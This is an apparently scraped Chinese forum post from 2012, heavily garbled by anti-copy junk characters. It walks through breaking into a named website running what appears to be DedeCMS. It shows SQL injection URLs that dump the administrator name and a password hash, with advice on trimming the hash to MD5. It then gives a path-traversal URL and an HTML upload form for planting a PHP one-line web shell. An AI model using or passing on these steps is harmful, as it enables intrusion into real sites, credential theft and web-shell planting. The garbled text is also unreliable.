①注入漏洞。* v8 a2 t$ N |0 i# J/ ?
这站 http://www.political-security.com/" v: Z ?* M* G3 e" }
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, y4 d6 y2 C( N6 g
www.political-security.com/data/mysql_error_trace.inc 爆后台
$ ~5 ^6 B7 A1 x. d8 A" o然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
9 d" ?6 {1 ?* g3 c& Y然后写上语句
: y( i U& y' |% A& w% A查看管理员帐号) @4 W& _1 o% j/ A
http://www.political-security.co ... &membergroup=@`
/ z4 Z) s3 r+ \# Y5 T* N! o: Q
T( c7 A/ ^6 b9 j) jadmin
6 b+ n V! @. l5 H+ U
" k: ~- Y1 k5 |! n0 u2 Z2 {9 E查看管理员密码
& g- {1 q1 F$ S4 l8 b7 @& J http://www.political-security.co ... &membergroup=@`+ g* i _/ z# x' @( F
) o* k. \5 a- i3 j+ J
8d29b1ef9f8c5a5af429
9 r2 ~6 x2 l. j# O' Q% |
9 ?. F, z" L1 r' V8 g& A& z查看管理员密码
, E7 X- H; Q# o, U
( \2 q: r" C5 t, M' _7 ^, L得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5; y* D V7 w5 m, h2 t
. e+ S+ M" @0 C) s; h( d. y1 I
8d2. A6 G) C) H! J) I
9b1ef9f8c5a5af42
' p3 d/ n+ C' W- M/ |97 y. }' @( f3 X& l$ ` ~
5 i" ~/ [3 m/ D! Ycmd5没解出来 只好测试第二个方法
3 H1 o* W; ?3 f1 G9 f8 j S% G0 X9 N% B, D% g
s/ z/ h" h8 p
②上传漏洞:
0 D% C X; N% K0 g. i2 ~* I! b
7 P# n8 J( p" K" `6 H# _$ G' P. ?只要登陆会员中心,然后访问页面链接8 O" z+ U: l; [! F: ?- L
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”2 \- ?% Q7 T/ I5 X. x& l! U
# n2 D' |/ {7 i: D( @0 `
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 x+ x& B/ ^& {, m+ Q& I- z* k) p& c0 m k6 C( z
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm/ w; M% I+ Q$ [5 z7 p, J! }
3 \5 ]6 C7 M0 v$ Y, ]" ]; ^. ~<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>$ c- y, W: n7 r8 j6 R- L7 _1 Z
或者& W' d" c; Z+ Y* e7 K6 g
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对